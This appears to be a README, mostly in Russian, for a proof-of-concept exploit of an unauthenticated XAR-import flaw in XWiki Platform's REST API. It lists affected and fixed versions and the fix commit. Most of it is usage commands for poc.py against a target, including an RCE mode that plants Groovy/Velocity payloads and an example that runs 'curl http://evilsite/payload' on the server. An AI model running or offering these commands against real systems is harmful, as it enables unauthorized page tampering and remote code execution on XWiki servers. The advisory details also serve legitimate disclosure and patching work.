
XWiki Platform - CVE-2026-33137 PoC - Unauthenticated XAR Import via REST /wikis/{wikiName}
XWiki Platform - Неаутентифицированный импорт XAR через REST /wikis/{wikiName}
Конечная точка REST API POST /wikis/{wikiName} в XWiki Platform выполняет импорт XAR (XWiki Archive) без выполнения каких-либо проверок аутентификации или авторизации. Неаутентифицированный злоумышленник может создавать или обновлять произвольные документы в целевой вики, отправляя специально сформированный XAR-файл.
AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| Статус | Версии |
|---|---|
| Уязвимые | > 15.10.16, > 16.4.6, > 16.10.2 |
| Исправленные | 16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1 |
Неаутентифицированный злоумышленник может:
REST-эндпоинт POST /xwiki/rest/wikis/{wikiName} принимает XAR-файл в теле запроса и импортирует его напрямую в вики, не проверяя, есть ли у запрашивающего права ADMIN. Исправление (коммит 4b7b95b) добавляет проверку авторизации с помощью ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...).
# Install requirements
pip install requests
# Basic usage
python poc.py -t http://target:8080
# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage
# Probe the target first
python poc.py -t http://target:8080 --probe
# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080
# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"
# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"
# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass
--rce)Флаг --rce импортирует страницы, содержащие Groovy и Velocity-пейлоады, которые выполняют указанную командную строку. Он автоматически:
{{groovy}} и {{velocity}}Требования для успешного RCE:
-u / --password)package.xml - описание пакета{Space}/{Page}.xml - XML-документ с содержимымЭтот PoC предоставлен исключительно в образовательных целях и для авторизованного тестирования безопасности. Несанкционированное использование этого эксплойта против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением.